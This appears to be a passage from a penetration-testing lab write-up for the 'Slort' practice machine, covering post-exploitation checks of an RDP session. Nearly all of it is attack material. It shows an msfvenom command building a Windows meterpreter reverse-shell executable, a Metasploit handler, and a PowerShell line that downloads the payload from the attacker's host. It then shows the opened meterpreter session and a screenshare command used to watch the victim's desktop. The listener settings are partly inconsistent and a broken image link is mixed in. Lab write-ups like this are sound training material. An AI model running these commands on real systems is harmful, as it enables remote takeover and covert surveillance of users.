RDP Session
There appears to be an active RDP session identified by PEAS
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=$tun0 LPORT=9998 -f exe -o msf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: msf.exe
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/slort]
└─$ msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.134.53;set LPORT 9998;run;"setting up Metasploit
PS C:\tmp> iwr -uri http://192.168.45.215/msf.exe -OutFile .\msf.exe
[*] Started reverse TCP handler on 0.0.0.0:9998
[*] Sending stage (177734 bytes) to 192.168.134.53
[*] Meterpreter session 2 opened (192.168.45.215:9998 -> 192.168.134.53:64743) at 2025-02-08 00:06:22 +0100
meterpreter > screenshare
[*] Preparing player...
[*] Opening player at: /home/kali/PEN-200/PG_PRACTICE/slort/SsoJvnOh.html
[*] Streaming.../Practice/Slort/4-Post_Enumeration/attachments/{FD12F613-6AD1-49CE-9A1B-906A8CE3BF76}.png)
It does appear that the user indeed has a GUI session, but there is no movement